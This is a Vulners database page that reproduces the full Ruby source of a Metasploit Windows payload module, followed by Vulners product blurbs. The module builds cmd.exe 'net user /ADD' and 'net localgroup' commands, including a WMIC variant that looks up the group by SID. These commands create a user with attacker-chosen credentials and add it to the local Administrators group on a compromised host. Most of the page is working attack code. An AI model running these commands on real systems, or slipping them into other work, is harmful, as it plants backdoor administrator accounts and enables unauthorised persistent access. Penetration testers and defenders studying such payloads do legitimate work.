Vulners
Lucene search
Windows Execute net user /ADD CMD
🗓️ 23 Aug 2010 22:50:24Reported by hdm <[email protected]>, scriptjunkie, Chris John RileyType 
metasploit🔗 www.rapid7.com👁 55 Views
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
module MetasploitModule
CachedSize = 97
include Msf::Payload::Single
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'Windows Execute net user /ADD CMD',
'Description' => %q{
Create a new user and add them to local administration group.
Note: The specified password is checked for common complexity
requirements to prevent the target machine rejecting the user
for failing to meet policy requirements.
Complexity check: 8-14 chars (1 UPPER, 1 lower, 1 digit/special)
},
'Author' => ['hdm','scriptjunkie','Chris John Riley'],
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_CMD,
'Handler' => Msf::Handler::None,
'Session' => Msf::Sessions::CommandShell,
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic',
'Payload' =>
{
'Offsets' => { },
'Payload' => ''
}
))
register_options(
[
OptString.new('USER', [ true, "The username to create", "metasploit" ]),
OptString.new('PASS', [ true, "The password for this user", "Metasploit$1" ]),
OptString.new('CUSTOM', [ false, "Custom group name to be used instead of default", '' ]),
OptBool.new('WMIC', [ true, "Use WMIC on the target to resolve administrators group", false ]),
])
register_advanced_options(
[
OptBool.new("COMPLEXITY", [ true, "Check password for complexity rules", true ]),
])
end
def generate(_opts = {})
return super + command_string
end
def command_string
user = datastore['USER'] || 'metasploit'
pass = datastore['PASS'] || ''
cust = datastore['CUSTOM'] || ''
wmic = datastore['WMIC']
complexity = datastore['COMPLEXITY']
if(pass.length > 14)
raise ArgumentError, "Password for the adduser payload must be 14 characters or less"
end
if complexity and pass !~ /\A^.*((?=.{8,})(?=.*[a-z])(?=.*[A-Z])(?=.*[\d\W])).*$/
raise ArgumentError, "Password: #{pass} doesn't meet complexity requirements and may cause issues"
end
if not cust.empty?
print_status("Using custom group name #{cust}")
return "cmd.exe /c net user #{user} #{pass} /ADD && " +
"net localgroup \"#{cust}\" #{user} /ADD"
elsif wmic
print_status("Using WMIC to discover the administrative group name")
return "cmd.exe /c \"FOR /F \"usebackq tokens=2* skip=1 delims==\" " +
"%G IN (`wmic group where sid^='S-1-5-32-544' get name /Value`); do " +
"FOR /F \"usebackq tokens=1 delims==\" %X IN (`echo %G`); do " +
"net user #{user} #{pass} /ADD && " +
"net localgroup \"%X\" #{user} /ADD\""
else
return "cmd.exe /c net user #{user} #{pass} /ADD && " +
"net localgroup Administrators #{user} /ADD"
end
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Nov 2022 02:10Current
0.2Low risk
Vulners AI Score0.2